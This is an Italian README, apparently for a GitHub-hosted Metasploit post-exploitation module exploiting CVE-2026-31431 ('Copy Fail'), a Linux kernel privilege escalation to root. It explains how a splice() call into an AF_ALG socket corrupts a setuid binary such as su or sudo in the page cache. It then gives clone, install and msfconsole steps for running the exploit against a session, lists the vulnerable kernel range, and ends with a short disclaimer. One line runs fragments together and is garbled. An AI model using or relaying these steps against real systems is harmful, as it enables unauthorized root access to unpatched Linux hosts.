Modulo post-exploitation automatizzato di Metasploit per CVE-2026-31431 ("Copy Fail"). Sfrutta un difetto logico deterministico nel sottosistema AF_ALG del kernel Linux per ottenere l'elevazione locale dei privilegi (LPE) a root, corrompendo in modo sicuro un binario setuid direttamente nella Page Cache condivisa (RAM) senza modificare i file su disco.
Un modulo Metasploit Post-Exploitation automatizzato che sfrutta CVE-2026-31431 (noto anche come "Copy Fail") per eseguire un'Escalation Locale dei Privilegi (LPE) su kernel Linux vulnerabili (versioni da 4.14 a 6.19.12).
Il modulo sfrutta una falla logica nel sottosistema crittografico del kernel Linux (modulo algif_aead dell'interfaccia AF_ALG). A causa di un'ottimizzazione impropria della memoria in-place, un utente locale non privilegiato può utilizzare la system call splice() per mappare un binario di sistema di sola lettura (come /usr/bin/su o /usr/bin/sudo) in un socket AF_ALG ed eseguire una sovrascrittura controllata di 4 byte direttamente nella Page Cache di sistema (RAM).
Corrompendo specifiche istruzioni di controllo dei privilegi di un binario setuid in memoria, il modulo aggira i controlli di accesso e genera una shell root senza modificare il file fisico su disco.
shell che meterpreterregister_file_for_cleanup4.14 a 6.19.12git clone https://github.com/adityasingh108/CVE-2026-31431-Metasploit-exploit
cd CVE-2026-31431-Metasploit-exploit
I moduli personalizzati di Metasploit devono essere inseriti nel percorso dei moduli dell'utente locale:
~/.msf4/modules/
Creare la struttura di directory richiesta se non esiste già:
~/.msf4/modules/
└── post/
└── linux/
└── escalation/
Copiare il file copy_fail.rb nella seguente directory:
~/.msf4/modules/post/linux/escalation/
Struttura finale:
~/.msf4/modules/
└── post/
└── linux/
└── escalation/
└── copy_fail.rb
Avviare la console di Metasploit:
msfconsole
Ricaricare tutti i moduli:
reload_all
Caricare il modulo exploit:
use post/linux/escalation/copy_fail
show options
set SESSION 1
run
oppure
exploit
msfconsole
use post/linux/escalation/copy_fail
show options
set SESSION 1
run
Il modulo ha come target kernel Linux vulnerabili:
4.14 <= Kernel Version <= 6.19.12
Questo progetto è fornito esclusivamente a scopo educativo e per ricerche di sicurezza autorizzate. L'uso non autorizzato su sistemi di cui non si è proprietari o per i quali non si dispone di esplicita autorizzazione al test potrebbe violare leggi e regolamenti applicabili.
Usalo responsabilmente.